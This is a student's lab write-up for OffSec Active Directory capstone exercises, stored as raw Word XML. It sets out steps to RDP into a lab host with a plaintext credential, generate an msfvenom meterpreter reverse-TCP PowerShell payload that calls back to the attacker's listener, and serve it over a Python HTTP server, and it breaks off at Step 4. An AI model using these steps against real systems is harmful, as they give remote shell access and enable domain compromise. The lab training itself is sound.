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58D6" w14:textId="6E03678E" w:rsidR="006D0809" w:rsidRDefault="0180BCFD" w:rsidP="3A004363">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>CSOC 10</w:t>
      </w:r>
      <w:r w:rsidR="00E025D2">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0: </w:t>
      </w:r>
      <w:r w:rsidR="00431D37">
        <w:t>Active Directory Laboratory Challenge</w:t>
      </w:r>
      <w:r w:rsidR="00CE5256">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566182C0" w14:textId="7261EB02" w:rsidR="00B0390B" w:rsidRPr="00B0390B" w:rsidRDefault="00B24B07" w:rsidP="3A004363">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>October 6</w:t>
      </w:r>
      <w:r w:rsidR="3EE847B1" w:rsidRPr="006D0809">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 202</w:t>
      </w:r>
      <w:r w:rsidR="00C560EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51385712" w14:textId="77777777" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5081F98D" w14:textId="38DEDFC9" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="00BD61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pared By: </w:t>
      </w:r>
      <w:r w:rsidR="00B24B07">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ashish Hedau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225623C7" w14:textId="77777777" w:rsidR="00163836" w:rsidRDefault="00163836" w:rsidP="00B0390B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48654649" w14:textId="77777777" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="006A5F39">
      <w:pPr>
        <w:pStyle w:val="NoSpacing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554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70565" w14:textId="3A011006" w:rsidR="00930EBB" w:rsidRDefault="00930EBB">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2BB28346" w14:textId="7E722E51" w:rsidR="00CF1249" w:rsidRDefault="00930EB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191" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capstone Exercise 22.2.5 #3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1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2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7A62EB0B" w14:textId="78E65998" w:rsidR="00CF1249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493192" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Path to Compromise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2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2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3FE0044D" w14:textId="6B32373F" w:rsidR="00CF1249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493193" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to Reproduce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3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3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1011C8D4" w14:textId="141B9E52" w:rsidR="00CF1249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493194" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capstone Exercise 23.2.2 #3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4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13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1552321A" w14:textId="5F68F66F" w:rsidR="00CF1249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493195" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Path to Compromise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5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13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0D58D50F" w14:textId="1F8F76F0" w:rsidR="00CF1249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493196" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to Reproduce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6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14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23F24A1D" w14:textId="62D167B2" w:rsidR="00CF1249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493197" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capstone Exercise 23.2.2 #4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7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24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2111EDB7" w14:textId="4C61881D" w:rsidR="00CF1249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493198" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Path to Compromise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8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24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47D93B47" w14:textId="418B63FE" w:rsidR="00CF1249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493199" w:history="1">
            <w:r w:rsidR="00CF1249" w:rsidRPr="009A7C7C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to Reproduce</w:t>
            </w:r>
            <w:r w:rsidR="00CF1249">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CF1249">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CF1249">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147493199 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CF1249">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CF1249">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EC2D4E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00CF1249">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43C6B63A" w14:textId="73C3FCAA" w:rsidR="00930EBB" w:rsidRDefault="00930EBB">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="712E4D82" w14:textId="07C499F4" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="006A5F39">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4398A1A2" w14:textId="32698CA3" w:rsidR="00930EBB" w:rsidRDefault="00930EBB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0180BCFD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACA871" w14:textId="0702B4FA" w:rsidR="00861229" w:rsidRDefault="00861229" w:rsidP="0180BCFD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc147493191"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Capstone Exercise 22.2.5 #3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="159AA5D7" w14:textId="306408A6" w:rsidR="0180BCFD" w:rsidRDefault="00F94FC9" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc147493192"/>
      <w:r>
        <w:t>Path to Compromise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2AED8939" w14:textId="51EBB508" w:rsidR="00F94FC9" w:rsidRDefault="00F94FC9" w:rsidP="00F94FC9"/>
    <w:p w14:paraId="66C3A9CC" w14:textId="71FAB0DA" w:rsidR="00317940" w:rsidRDefault="00317940" w:rsidP="00F94FC9">
      <w:r>
        <w:t xml:space="preserve">The challenge involves RDP access to </w:t>
      </w:r>
      <w:r w:rsidR="00A74A5B">
        <w:t xml:space="preserve">“client75” using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A74A5B">
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A74A5B">
        <w:t xml:space="preserve"> credentials and IP. A PowerShell payload is generated via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A74A5B">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A74A5B">
        <w:t xml:space="preserve">, hosted on a Python server, and a shortcut with a shellcode runner is placed on “client75” Desktop. A Metasploit listener is established. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A74A5B">
        <w:t>SharpHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A74A5B">
        <w:t xml:space="preserve"> collects JSON files for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A74A5B">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A74A5B">
        <w:t xml:space="preserve"> analysis. The goal is to download, unzip, and feed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A74A5B">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A74A5B">
        <w:t xml:space="preserve"> with JSON data from “client75”, and then connect to “dc1” using “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A74A5B">
        <w:t>jeffadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A74A5B">
        <w:t>” credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB018BD" w14:textId="46BF14CB" w:rsidR="00317940" w:rsidRPr="00F94FC9" w:rsidRDefault="00317940" w:rsidP="00F94FC9"/>
    <w:p w14:paraId="3456F93D" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49588A21" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FD2F3B" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312123A4" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2818E416" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4DD5BF" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57630CCC" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4B8905" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2490F81B" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BFC291" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6276B9" w14:textId="77777777" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A727D65" w14:textId="7957109F" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A45540A" w14:textId="3E593DE3" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FDB1024" w14:textId="7A008684" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257962FF" w14:textId="5FE6FDE8" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388B9DCE" w14:textId="06387BB5" w:rsidR="00E97899" w:rsidRDefault="00E97899" w:rsidP="00E97899"/>
    <w:p w14:paraId="0FF47D26" w14:textId="3EE66A1C" w:rsidR="00E97899" w:rsidRPr="00E97899" w:rsidRDefault="00E97899" w:rsidP="00E97899"/>
    <w:p w14:paraId="1160BE47" w14:textId="0EAA8614" w:rsidR="0180BCFD" w:rsidRDefault="00861229" w:rsidP="00861229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc147493193"/>
      <w:r>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="121CE567" w14:textId="3A3F8A2A" w:rsidR="00861229" w:rsidRDefault="00861229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4A9728D" w14:textId="77777777" w:rsidR="000B28DF" w:rsidRDefault="000B28DF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01652DEC" w14:textId="440C4890" w:rsidR="000B28DF" w:rsidRDefault="000B28DF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0F28DA">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F28DA">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0036272C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The target IP</w:t>
      </w:r>
      <w:r w:rsidR="000F28DA">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0036272C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F28DA">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="0036272C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by offsec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FA503F" w14:textId="77777777" w:rsidR="000F28DA" w:rsidRDefault="000F28DA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0AAB4530" w14:textId="305E9E31" w:rsidR="000F28DA" w:rsidRDefault="000F28DA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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38E79804" wp14:editId="281826E6">
            <wp:extent cx="8229600" cy="3826510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="879008884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08884" name="Picture 4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3E16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E7D3766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0A6D623D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428485FF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97D9731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A16505E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D076F85" w14:textId="6EB9AFB9" w:rsidR="00AE1CA5" w:rsidRDefault="00AE1CA5" w:rsidP="00AE1CA5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9272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0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RDP into client75 using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xfreerdp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and provide the credentials (from offsec notes) and target system IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E21BF" w14:textId="77777777" w:rsidR="00AE1CA5" w:rsidRDefault="00AE1CA5" w:rsidP="00AE1CA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0D7193D3" w14:textId="4EB186B6" w:rsidR="00AE1CA5" w:rsidRPr="009272F9" w:rsidRDefault="00AE1CA5" w:rsidP="00AE1CA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xfreerdp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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jeff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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p:’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HenchmanPutriBonbon11</w:t>
      </w:r>
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’ /v:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.209.75</w:t>
      </w:r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w:1920 /h:1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147E0774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46ECE378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777327CA" w14:textId="4AE3CC89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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202A724C" wp14:editId="342F9657">
            <wp:extent cx="8229600" cy="1350645"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1304707973" name="Picture 43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7973" name="Picture 43" descr="A computer screen shot of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B528" w14:textId="77777777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32FD810" w14:textId="6FA3E573" w:rsidR="00AE1CA5" w:rsidRDefault="00AE1CA5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A9EC783" w14:textId="77777777" w:rsidR="0036272C" w:rsidRDefault="0036272C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F8509DB" w14:textId="77777777" w:rsidR="0036272C" w:rsidRPr="0063180D" w:rsidRDefault="0036272C" w:rsidP="00E97899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501882B" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="01C556BF" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="5AED92E5" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="372278AF" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="05EBFFAC" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="50599EEB" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="414A9652" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="6EFF958D" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="087833F9" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="57C0FC6C" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="4DB28521" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B" w:rsidP="00047E8B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077329">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00077329">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0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Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell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payload with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom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and host it on a python server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA296A" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B" w:rsidP="00047E8B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F03ACF7" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B" w:rsidP="00047E8B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msfvenom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p windows/x64/</w:t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meterpreter_reverse_tcp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LHOST=&lt;LOCAL IP&gt; LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=4242</w:t>
      </w:r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f </w:t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psh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o run_meterpreter.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F30F5" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B" w:rsidP="00047E8B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</w:p>
    <w:p w14:paraId="40D60DCE" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRPr="009272F9" w:rsidRDefault="00047E8B" w:rsidP="00047E8B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python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B7B4C2" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="6B19319E" w14:textId="253F188B" w:rsidR="00047E8B" w:rsidRDefault="00047E8B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="009D516F" wp14:editId="19EA0E36">
            <wp:extent cx="8229600" cy="2560320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1902720944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0944" name="Picture 4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BE93" w14:textId="77777777" w:rsidR="00047E8B" w:rsidRDefault="00047E8B"/>
    <w:p w14:paraId="105E83BC" w14:textId="77777777" w:rsidR="008C17DA" w:rsidRDefault="008C17DA"/>
    <w:p w14:paraId="6676EDB5" w14:textId="77777777" w:rsidR="008C17DA" w:rsidRDefault="008C17DA"/>
    <w:p w14:paraId="7B206114" w14:textId="77777777" w:rsidR="008C17DA" w:rsidRDefault="008C17DA"/>
    <w:p w14:paraId="3FDABB7C" w14:textId="77777777" w:rsidR="008C17DA" w:rsidRDefault="008C17DA"/>
    <w:p w14:paraId="4104DE4E" w14:textId="77777777" w:rsidR="008C17DA" w:rsidRDefault="008C17DA"/>
    <w:p w14:paraId="5D7CE82A" w14:textId="77777777" w:rsidR="008C17DA" w:rsidRDefault="008C17DA"/>
    <w:p w14:paraId="28502815" w14:textId="20921516" w:rsidR="008C17DA" w:rsidRDefault="008C17DA" w:rsidP="008C17DA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1D01B2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="001D01B2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0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Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell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shortcut on client7</w:t>
      </w:r>
      <w:r w:rsidR="00317940">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
